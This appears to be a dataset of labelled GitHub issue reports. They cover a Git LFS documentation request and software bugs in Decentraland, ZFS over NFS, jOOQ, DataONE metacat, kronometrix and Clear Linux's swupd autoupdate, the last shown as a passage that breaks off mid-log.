Make guide how to use Git Large File Storage - Create the manual on how to use Git Large File Storage
## I'm submitting a ...
- [ ] bug report
- [x] feature request
- [ ] question
## Expected Behavior
## Actual Behavior
## Steps to Reproduce the Problem
1.
1.
1.
## Specifications
- Version:
- Platform:
- Subsystem:
## How can this issue be closed?
This issue can be closed when manual will be added to the website.
|
non_defect
|
make guide how to use git large file storage create the manual on how to use git large file storage i m submitting a bug report feature request question expected behavior actual behavior steps to reproduce the problem specifications version platform subsystem how can this issue be closed this issue can be closed when manual will be added to the website
| 0
|
66,299
| 20,122,728,267
|
IssuesEvent
|
2022-02-08 05:23:06
|
decentraland/unity-renderer
|
https://api.github.com/repos/decentraland/unity-renderer
|
opened
|
NFTShapes (AKA Picture Frames) not working on desktop client
|
defect
|
neither static images like the ones in the Genesis Plaza mini NFTshapes Gallery nor GIFs like the ones in the north-west gallery in Soho Plaza
|
1.0
|
NFTShapes (AKA Picture Frames) not working on desktop client - neither static images like the ones in the Genesis Plaza mini NFTshapes Gallery nor GIFs like the ones in the north-west gallery in Soho Plaza
|
defect
|
nftshapes aka picture frames not working on desktop client neither static images like the ones in the genesis plaza mini nftshapes gallery nor gifs like the ones in the north west gallery in soho plaza
| 1
|
65,875
| 19,749,388,158
|
IssuesEvent
|
2022-01-15 00:02:54
|
openzfs/zfs
|
https://api.github.com/repos/openzfs/zfs
|
closed
|
nfstest_sparse fails for SEEK operations with NFS+ZFS.
|
Component: Share Type: Defect Status: Stale
|
<!-- Please fill out the following template, which will help other contributors address your issue. -->
<!--
Thank you for reporting an issue.
*IMPORTANT* - Please check our issue tracker before opening a new issue.
Additional valuable information can be found in the OpenZFS documentation
and mailing list archives.
Please fill in as much of the template as possible.
-->
### System information
Distribution Name | Ubuntu
Distribution Version | 20.04
Linux Kernel | 5.4.0-51-generic
Architecture | x86_64
ZFS Version | 0.8.3-1ubuntu12.4
SPL Version | 0.8.3-1ubuntu12.4
### Describe the problem you're observing
nfstest_sparse is part of NFSTest suite. This test fails with the following error:
```
DBG3: 10:32:17.189694 - SEEK using SEEK_DATA on file /mnt/nfstest1/nfstest_sparse_20201014103210_f_2 starting at offset 65536
INFO: 10:32:17.258652 - SEEK returned offset 65536
DBG2: 10:32:17.258879 - Trace stop
DBG2: 10:32:17.258980 - /usr/bin/sudo killall tcpdump
DBG2: 10:32:17.289253 - /usr/bin/sudo kill 135694
PASS: SEEK should succeed searching for the next data
FAIL: SEEK should return correct offset when the next data is found, expecting offset 131072 but got 65536
```
[nfstest_sparse_20201014103210.log](https://github.com/openzfs/zfs/files/5388420/nfstest_sparse_20201014103210.log)
### Describe how to reproduce the problem
Run nfstest_sparse with an export backed by ZFS
```
nfstest_sparse -s <nfs-server-ip> -e /<export-name> -m /mnt/nfstest1 --createlog --tmpdir /tmp --createtraces --keeptraces -v debug --runtest seek01
```
If the test is run against an export backed by ext4, it passes.
### Include any warning/errors/backtraces from the system logs
|
1.0
|
nfstest_sparse fails for SEEK operations with NFS+ZFS. - <!-- Please fill out the following template, which will help other contributors address your issue. -->
<!--
Thank you for reporting an issue.
*IMPORTANT* - Please check our issue tracker before opening a new issue.
Additional valuable information can be found in the OpenZFS documentation
and mailing list archives.
Please fill in as much of the template as possible.
-->
### System information
Distribution Name | Ubuntu
Distribution Version | 20.04
Linux Kernel | 5.4.0-51-generic
Architecture | x86_64
ZFS Version | 0.8.3-1ubuntu12.4
SPL Version | 0.8.3-1ubuntu12.4
### Describe the problem you're observing
nfstest_sparse is part of NFSTest suite. This test fails with the following error:
```
DBG3: 10:32:17.189694 - SEEK using SEEK_DATA on file /mnt/nfstest1/nfstest_sparse_20201014103210_f_2 starting at offset 65536
INFO: 10:32:17.258652 - SEEK returned offset 65536
DBG2: 10:32:17.258879 - Trace stop
DBG2: 10:32:17.258980 - /usr/bin/sudo killall tcpdump
DBG2: 10:32:17.289253 - /usr/bin/sudo kill 135694
PASS: SEEK should succeed searching for the next data
FAIL: SEEK should return correct offset when the next data is found, expecting offset 131072 but got 65536
```
[nfstest_sparse_20201014103210.log](https://github.com/openzfs/zfs/files/5388420/nfstest_sparse_20201014103210.log)
### Describe how to reproduce the problem
Run nfstest_sparse with an export backed by ZFS
```
nfstest_sparse -s <nfs-server-ip> -e /<export-name> -m /mnt/nfstest1 --createlog --tmpdir /tmp --createtraces --keeptraces -v debug --runtest seek01
```
If the test is run against an export backed by ext4, it passes.
### Include any warning/errors/backtraces from the system logs
|
defect
|
nfstest sparse fails for seek operations with nfs zfs thank you for reporting an issue important please check our issue tracker before opening a new issue additional valuable information can be found in the openzfs documentation and mailing list archives please fill in as much of the template as possible system information distribution name ubuntu distribution version linux kernel generic architecture zfs version spl version describe the problem you re observing nfstest sparse is part of nfstest suite this test fails with the following error seek using seek data on file mnt nfstest sparse f starting at offset info seek returned offset trace stop usr bin sudo killall tcpdump usr bin sudo kill pass seek should succeed searching for the next data fail seek should return correct offset when the next data is found expecting offset but got describe how to reproduce the problem run nfstest sparse with an export backed by zfs nfstest sparse s e m mnt createlog tmpdir tmp createtraces keeptraces v debug runtest if the test is run against an export backed by it passes include any warning errors backtraces from the system logs
| 1
|
62,893
| 17,242,700,934
|
IssuesEvent
|
2021-07-21 02:29:46
|
vector-im/element-web
|
https://api.github.com/repos/vector-im/element-web
|
opened
|
Message bubble corner rounding doesn't take into account whether events have a tile
|
A-Appearance A-MessageBubbles S-Tolerable T-Defect
|
Message bubbles apparently try to square off the corners of bubbles that are touching. But if someone sends a message and then edits it immediately afterwards, the bottom left corner of that message will be square instead of round since it thinks the edit event will appear in its own bubble, when that is not in fact the case.

|
1.0
|
Message bubble corner rounding doesn't take into account whether events have a tile - Message bubbles apparently try to square off the corners of bubbles that are touching. But if someone sends a message and then edits it immediately afterwards, the bottom left corner of that message will be square instead of round since it thinks the edit event will appear in its own bubble, when that is not in fact the case.

|
defect
|
message bubble corner rounding doesn t take into account whether events have a tile message bubbles apparently try to square off the corners of bubbles that are touching but if someone sends a message and then edits it immediately afterwards the bottom left corner of that message will be square instead of round since it thinks the edit event will appear in its own bubble when that is not in fact the case
| 1
|
32,529
| 6,819,773,647
|
IssuesEvent
|
2017-11-07 11:26:11
|
jOOQ/jOOQ
|
https://api.github.com/repos/jOOQ/jOOQ
|
closed
|
ConvertAll inefficiently unboxes and boxes primitive types
|
C: Functionality P: Medium R: Fixed T: Defect
|
The internal `ConvertAll` utility inefficiently unboxes and boxes between `Integer.class` and `int.class` types. If we already have the right boxed value, there's no need to run through the numeric conversion, we can just return the boxed value directly:

This seems to reduce CPU time considerably in many cases where we map to POJOs that use primitive types in their methods / members.
|
1.0
|
ConvertAll inefficiently unboxes and boxes primitive types - The internal `ConvertAll` utility inefficiently unboxes and boxes between `Integer.class` and `int.class` types. If we already have the right boxed value, there's no need to run through the numeric conversion, we can just return the boxed value directly:

This seems to reduce CPU time considerably in many cases where we map to POJOs that use primitive types in their methods / members.
|
defect
|
convertall inefficiently unboxes and boxes primitive types the internal convertall utility inefficiently unboxes and boxes between integer class and int class types if we already have the right boxed value there s no need to run through the numeric conversion we can just return the boxed value directly this seems to reduce cpu time considerably in many cases where we map to pojos that use primitive types in their methods members
| 1
|
219,055
| 7,333,094,422
|
IssuesEvent
|
2018-03-05 18:17:51
|
NCEAS/metacat
|
https://api.github.com/repos/NCEAS/metacat
|
closed
|
Metadata/data objects which have obsoletedBy field ignore the resource map index
|
Category: index Component: Bugzilla-Id Priority: Normal Status: Closed Tracker: Bug
|
---
Author Name: **Jing Tao** (Jing Tao)
Original Redmine Issue: 7083, https://projects.ecoinformatics.org/ecoinfo/issues/7083
Original Date: 2016-08-08
Original Assignee: Jing Tao
---
Hi Bryce:
I looked at the index of the 16 objects and found 5 of them don't have the value of resource_map_urn:uuid:2e3c8c4c-e606-4710-b321-8edc4d506b0a at the resourceMap element:
urn%3Auuid%3A0f64673d-d270-411f-a5ed-98351d3d9450
urn%3Auuid%3A12c0ab6a-5eb3-43de-a16c-e71acaeb9817
urn%3Auuid%3A45ee065f-746e-4780-872b-d98cabeb0ad7
urn%3Auuid%3Aae90efa8-3cf5-4ff9-9637-c7be28b06541
urn%3Auuid%3Accebed0b-6bdb-4853-ba2a-6e88321ea4d5
So this is the reason you only get 11 documents when you query this resource map value.
And all of the five objects have the field "obsoletedBy" and the other 11 object don't have the field.
The reason why I looked at the field "obsoletedBy" is I recently found that there was a bug in the d1_cn_index_processor component - when you index a resource map, the component in the resource map will ignore the resource map if it has the "obsoletedBy" field. So this issue sounds like the reflection of this bug.
I will look at the metacat index code to make sure.
Thanks,
Jing
On 8/8/16 12:13 PM, Bryce Mecum wrote:
>
> So @scng got a hold of me to ask about strange behavior where there package table on two dataset pages are not showing the right number of files. This is a write up of what she told me and what I found so that someone else, @couture or @cjones can see about addressing it. This is a blocker on Bill Simpson's ticket RT12930.
>
> This applies to two packages:
>
> O-Buoy 8 (needs link)
> O-Buoy 15
>
> These two packages were recently updated to make them editable (adding otherEntity elements to the EML) by @scng using the R package.
>
> If you look at O-Buoy 15, you'll see ten data objects in the package. However, the R @scng wrote intended to add 15 data objects to the package. If you look at the resource map, resource_map_urn:uuid:2e3c8c4c-e606-4710-b321-8edc4d506b0a, you'll see it aggregates+documents 16 PIDs (metadata + 15 data):
>
> Here's an invalid and abridged section from the resource map, converted to Turtle format before pasting here:
> ...
> ore:aggregates <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A0f64673d-d270-411f-a5ed-98351d3d9450>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A12c0ab6a-5eb3-43de-a16c-e71acaeb9817>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A1584c53e-3d5c-4b70-9bf6-1033de8e2fd1>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A1c2d1c50-4d79-4fe5-b650-024e63818336>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A2e3c8c4c-e606-4710-b321-8edc4d506b0a>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A30a3a76c-c965-4594-8cfd-c652d46ebbe5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A40d6e8e4-83eb-4579-8b00-90bf28282769>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A45ee065f-746e-4780-872b-d98cabeb0ad7>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A4eb92d77-19f4-4a3a-8468-4022926ea4e2>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A6d57e765-32a0-4a3e-ba12-5e681f92b7e5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A73926857-7d7c-4a6e-bce3-1556bd98df01>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A770eb22d-88bb-4c6f-9016-283f4ff7a518>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A8539eac4-21f5-4a3a-8c0a-5ad7249cf38c>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Aae90efa8-3cf5-4ff9-9637-c7be28b06541>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Accebed0b-6bdb-4853-ba2a-6e88321ea4d5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Ad54c9d42-99ce-415b-ac7c-a2b3498eb7af> ;
> ...
>
> So it looks like the Resource Map is correct which makes sense because it was generated using the R package.
>
> The package view uses the Solr query resourceMap:{RESOURCE_MAP} to fill in the table. If you run this query you see the 11 objects, not 16. This explains the table view not showing all the files.
>
> If you look at the documents section of the metadata object's Solr doc, you'll see the 16 objects it documents (itself + 15 data objects.
>
> So what's going on here? Am I wrong to think that it's just the index that is showing the wrong information?
>
> I have forced a reindex with no change
> I have not checked the arctica logs for any errors
|
1.0
|
Metadata/data objects which have obsoletedBy field ignore the resource map index - ---
Author Name: **Jing Tao** (Jing Tao)
Original Redmine Issue: 7083, https://projects.ecoinformatics.org/ecoinfo/issues/7083
Original Date: 2016-08-08
Original Assignee: Jing Tao
---
Hi Bryce:
I looked at the index of the 16 objects and found 5 of them don't have the value of resource_map_urn:uuid:2e3c8c4c-e606-4710-b321-8edc4d506b0a at the resourceMap element:
urn%3Auuid%3A0f64673d-d270-411f-a5ed-98351d3d9450
urn%3Auuid%3A12c0ab6a-5eb3-43de-a16c-e71acaeb9817
urn%3Auuid%3A45ee065f-746e-4780-872b-d98cabeb0ad7
urn%3Auuid%3Aae90efa8-3cf5-4ff9-9637-c7be28b06541
urn%3Auuid%3Accebed0b-6bdb-4853-ba2a-6e88321ea4d5
So this is the reason you only get 11 documents when you query this resource map value.
And all of the five objects have the field "obsoletedBy" and the other 11 object don't have the field.
The reason why I looked at the field "obsoletedBy" is I recently found that there was a bug in the d1_cn_index_processor component - when you index a resource map, the component in the resource map will ignore the resource map if it has the "obsoletedBy" field. So this issue sounds like the reflection of this bug.
I will look at the metacat index code to make sure.
Thanks,
Jing
On 8/8/16 12:13 PM, Bryce Mecum wrote:
>
> So @scng got a hold of me to ask about strange behavior where there package table on two dataset pages are not showing the right number of files. This is a write up of what she told me and what I found so that someone else, @couture or @cjones can see about addressing it. This is a blocker on Bill Simpson's ticket RT12930.
>
> This applies to two packages:
>
> O-Buoy 8 (needs link)
> O-Buoy 15
>
> These two packages were recently updated to make them editable (adding otherEntity elements to the EML) by @scng using the R package.
>
> If you look at O-Buoy 15, you'll see ten data objects in the package. However, the R @scng wrote intended to add 15 data objects to the package. If you look at the resource map, resource_map_urn:uuid:2e3c8c4c-e606-4710-b321-8edc4d506b0a, you'll see it aggregates+documents 16 PIDs (metadata + 15 data):
>
> Here's an invalid and abridged section from the resource map, converted to Turtle format before pasting here:
> ...
> ore:aggregates <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A0f64673d-d270-411f-a5ed-98351d3d9450>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A12c0ab6a-5eb3-43de-a16c-e71acaeb9817>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A1584c53e-3d5c-4b70-9bf6-1033de8e2fd1>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A1c2d1c50-4d79-4fe5-b650-024e63818336>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A2e3c8c4c-e606-4710-b321-8edc4d506b0a>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A30a3a76c-c965-4594-8cfd-c652d46ebbe5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A40d6e8e4-83eb-4579-8b00-90bf28282769>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A45ee065f-746e-4780-872b-d98cabeb0ad7>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A4eb92d77-19f4-4a3a-8468-4022926ea4e2>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A6d57e765-32a0-4a3e-ba12-5e681f92b7e5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A73926857-7d7c-4a6e-bce3-1556bd98df01>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A770eb22d-88bb-4c6f-9016-283f4ff7a518>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3A8539eac4-21f5-4a3a-8c0a-5ad7249cf38c>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Aae90efa8-3cf5-4ff9-9637-c7be28b06541>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Accebed0b-6bdb-4853-ba2a-6e88321ea4d5>
> <https://cn.dataone.org/cn/v2/resolve/urn%3Auuid%3Ad54c9d42-99ce-415b-ac7c-a2b3498eb7af> ;
> ...
>
> So it looks like the Resource Map is correct which makes sense because it was generated using the R package.
>
> The package view uses the Solr query resourceMap:{RESOURCE_MAP} to fill in the table. If you run this query you see the 11 objects, not 16. This explains the table view not showing all the files.
>
> If you look at the documents section of the metadata object's Solr doc, you'll see the 16 objects it documents (itself + 15 data objects.
>
> So what's going on here? Am I wrong to think that it's just the index that is showing the wrong information?
>
> I have forced a reindex with no change
> I have not checked the arctica logs for any errors
|
non_defect
|
metadata data objects which have obsoletedby field ignore the resource map index author name jing tao jing tao original redmine issue original date original assignee jing tao hi bryce i looked at the index of the objects and found of them don t have the value of resource map urn uuid at the resourcemap element urn urn urn urn urn so this is the reason you only get documents when you query this resource map value and all of the five objects have the field obsoletedby and the other object don t have the field the reason why i looked at the field obsoletedby is i recently found that there was a bug in the cn index processor component when you index a resource map the component in the resource map will ignore the resource map if it has the obsoletedby field so this issue sounds like the reflection of this bug i will look at the metacat index code to make sure thanks jing on pm bryce mecum wrote so scng got a hold of me to ask about strange behavior where there package table on two dataset pages are not showing the right number of files this is a write up of what she told me and what i found so that someone else couture or cjones can see about addressing it this is a blocker on bill simpson s ticket this applies to two packages o buoy needs link o buoy these two packages were recently updated to make them editable adding otherentity elements to the eml by scng using the r package if you look at o buoy you ll see ten data objects in the package however the r scng wrote intended to add data objects to the package if you look at the resource map resource map urn uuid you ll see it aggregates documents pids metadata data here s an invalid and abridged section from the resource map converted to turtle format before pasting here ore aggregates so it looks like the resource map is correct which makes sense because it was generated using the r package the package view uses the solr query resourcemap resource map to fill in the table if you run this query you see the objects not this explains the table view not showing all the files if you look at the documents section of the metadata object s solr doc you ll see the objects it documents itself data objects so what s going on here am i wrong to think that it s just the index that is showing the wrong information i have forced a reindex with no change i have not checked the arctica logs for any errors
| 0
|
27,358
| 4,971,652,917
|
IssuesEvent
|
2016-12-05 19:19:14
|
kronometrix/recording
|
https://api.github.com/repos/kronometrix/recording
|
closed
|
webrec timestamp format
|
defect-high
|
We dont need the time stamp be like this:
```
1479580666.253:www.reittiopas.fi:0.260:0.128:0.018:0.128:0.223:41266:200
1479580666.253:www.mtv.fi:0.296:0.085:0.018:0.085:0.106:298113:200
1479580666.253:www.iltalehti.fi:0.322:0.110:0.007:0.110:0.143:578886:200
1479580666.253:www.yle.fi:0.409:0.188:0.007:0.189:0.278:306142:200
1479580666.252:www.hs.fi:0.614:0.378:0.030:0.378:0.402:466376:200
1479580666.252:www.kela.fi:0.641:0.348:0.135:0.348:0.449:93863:200
1479580666.252:www.vr.fi:0.508:0.044:0.042:0.059:0.030:307780:200
1479580666.252:www.finnair.com:0.530:0.073:0.056:0.094:0.211:34819:200
1479580666.253:www.a-katsastus.fi:0.662:0.025:0.007:0.049:0.367:49171:200
1479580666.253:www.sanoma.com:0.587:0.216:0.018:0.216:0.323:33914:200
1479580666.253:www.iltasanomat.fi:0.660:0.106:0.052:0.106:0.225:587117:200
1479580666.253:www.dna.fi:0.753:0.103:0.038:0.150:0.171:96095:200
```
but rather simple: 1479580666
In other recorders we have something like this:
```
use Time::HiRes qw(time alarm setitimer ITIMER_REAL);
...
my $tp = 0; # time precision
...
# check interval input
if ( $interval =~ /\./ ) {
$tp = 3;
}
...
printf "%.${tp}f:%s:%.2f:% ...
```
|
1.0
|
webrec timestamp format - We dont need the time stamp be like this:
```
1479580666.253:www.reittiopas.fi:0.260:0.128:0.018:0.128:0.223:41266:200
1479580666.253:www.mtv.fi:0.296:0.085:0.018:0.085:0.106:298113:200
1479580666.253:www.iltalehti.fi:0.322:0.110:0.007:0.110:0.143:578886:200
1479580666.253:www.yle.fi:0.409:0.188:0.007:0.189:0.278:306142:200
1479580666.252:www.hs.fi:0.614:0.378:0.030:0.378:0.402:466376:200
1479580666.252:www.kela.fi:0.641:0.348:0.135:0.348:0.449:93863:200
1479580666.252:www.vr.fi:0.508:0.044:0.042:0.059:0.030:307780:200
1479580666.252:www.finnair.com:0.530:0.073:0.056:0.094:0.211:34819:200
1479580666.253:www.a-katsastus.fi:0.662:0.025:0.007:0.049:0.367:49171:200
1479580666.253:www.sanoma.com:0.587:0.216:0.018:0.216:0.323:33914:200
1479580666.253:www.iltasanomat.fi:0.660:0.106:0.052:0.106:0.225:587117:200
1479580666.253:www.dna.fi:0.753:0.103:0.038:0.150:0.171:96095:200
```
but rather simple: 1479580666
In other recorders we have something like this:
```
use Time::HiRes qw(time alarm setitimer ITIMER_REAL);
...
my $tp = 0; # time precision
...
# check interval input
if ( $interval =~ /\./ ) {
$tp = 3;
}
...
printf "%.${tp}f:%s:%.2f:% ...
```
|
defect
|
webrec timestamp format we dont need the time stamp be like this but rather simple in other recorders we have something like this use time hires qw time alarm setitimer itimer real my tp time precision check interval input if interval tp printf tp f s
| 1
|
270,513
| 8,461,289,986
|
IssuesEvent
|
2018-10-22 21:21:04
|
clearlinux/swupd-client
|
https://api.github.com/repos/clearlinux/swupd-client
|
closed
|
swupd: autoupdate broken (25550); can not enable
|
bug high priority
|
My system had autoupdate disabled and had fallen behind quite a bit:
```
$ sudo swupd info
Installed version: 24710
Version URL: https://download.clearlinux.org/update/
Content URL: https://cdn.download.clearlinux.org/update/
```
So I manually update to the latest release:
```
$ sudo swupd update
Update started.
Preparing to update from 24710 to 25550
Downloading packs...
...35%
Extracting zstd pack for version 25470
...100%
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 200 - Failure when receiving data from the peer
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 200 - Failure when receiving data from the peer
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #2 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #2 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #3 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #3 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #4 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #4 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #5 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #5 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - Timeout was reached
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - Timeout was reached
Statistics for going from version 24710 to version 25550:
changed bundles : 66
new bundles : 5
deleted bundles : 0
changed files : 297291
new files : 27712
deleted files : 40718
Starting download of remaining update content. This may take a while...
...0%Error for /var/lib/swupd/download/.85f02a25adeec74f39d6ad7375e9833a687bf7ed5c7e6f4486a597e137035faf.tar download: Response 0 - Couldn't connect to server
...100%
Finishing download of update content...
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25440/files/85f02a25adeec74f39d6ad7375e9833a687bf7ed5c7e6f4486a597e137035faf.tar
Staging file content
Applying update
...100%
Update was applied.
Calling post-update helper scripts.
none
rngd.service: needs a restart (a library dependency was updated)
clr_debug_fuse.service: needs a restart (a library dependency was updated)
pacdiscovery.service: needs a restart (the binary was updated)
tallow.service: needs a restart (the binary was updated)
systemd-udevd.service: needs a restart (the binary was updated)
pacrunner.service: needs a restart (the binary was updated)
systemd-journald.service: needs a restart (the binary was updated)
clr_debug_daemon.service: needs a restart (a library dependency was updated)
httpd.service: needs a restart (the binary was updated)
mcelog.service: needs a restart (the binary was updated)
systemd-resolved.service: needs a restart (the binary was updated)
systemd-timesyncd.service: needs a restart (the binary was updated)
Update took 1799.1 seconds
37706 files were not in a pack
Update successful. System updated from version 24710 to version 25550
```
Due to many service updates, I rebooted after the update:
```
* A kernel update is available: you may wish to reboot the system.
* Some system services need a restart.
Run `sudo clr-service-restart -a -n` to view them.
WARNING: No system proxies configured.
See /home/mhorn/.README.txt for setup information.
$ sudo clr-service-restart -a -n
systemd-networkd.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart systemd-networkd.service
docker.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart docker.service
polkit.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart polkit.service
bluetooth.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart bluetooth.service
accounts-daemon.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart accounts-daemon.service
wpa_supplicant.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart wpa_supplicant.service
ModemManager.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart ModemManager.service
fwupd.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart fwupd.service
colord.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart colord.service
gdm.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart gdm.service
upower.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart upower.service
dbus.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart dbus.service
systemd-logind.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart systemd-logind.service
```
After the reboot I attempt to enable autoupdate:
```
$ sudo swupd autoupdate
Disabled
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Removed /etc/systemd/system/swupd-update.service.
Removed /etc/systemd/system/swupd-update.timer.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
```
Tried a second time:
```
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
$ sudo swupd autoupdate
Failed to get unit file state for swupd-update.service: No such file or directory
Disabled
```
Attempted a Verify:
```
$ sudo swupd verify
Verifying version 25550
Verifying files
...100%
Inspected 320900 files
Verify successful
```
Verify is clean, tried again:
```
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
$ sudo swupd autoupdate
Failed to get unit file state for swupd-update.service: No such file or directory
Disabled
```
Okay, Verify Fix:
```
$ sudo swupd verify --fix
Verifying version 25550
Verifying files
...100%
Starting download of remaining update content. This may take a while...
...100%
Finishing download of update content...
Adding any missing files
Fixing modified files
...100%
Inspected 320900 files
0 files were missing
0 files found which should be deleted
Calling post-update helper scripts.
none
Fix successful
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
```
Still not able to enable auto-update.
Next steps?
|
1.0
|
swupd: autoupdate broken (25550); can not enable - My system had autoupdate disabled and had fallen behind quite a bit:
```
$ sudo swupd info
Installed version: 24710
Version URL: https://download.clearlinux.org/update/
Content URL: https://cdn.download.clearlinux.org/update/
```
So I manually update to the latest release:
```
$ sudo swupd update
Update started.
Preparing to update from 24710 to 25550
Downloading packs...
...35%
Extracting zstd pack for version 25470
...100%
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 200 - Failure when receiving data from the peer
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 200 - Failure when receiving data from the peer
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #2 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #2 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #3 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #3 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #4 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #4 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - No error
Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - No error
Starting download retry #5 for https://cdn.download.clearlinux.org/update//25550/pack-package-builder-from-0.tar
Starting download retry #5 for https://cdn.download.clearlinux.org/update//25550/pack-x11-server-from-0.tar
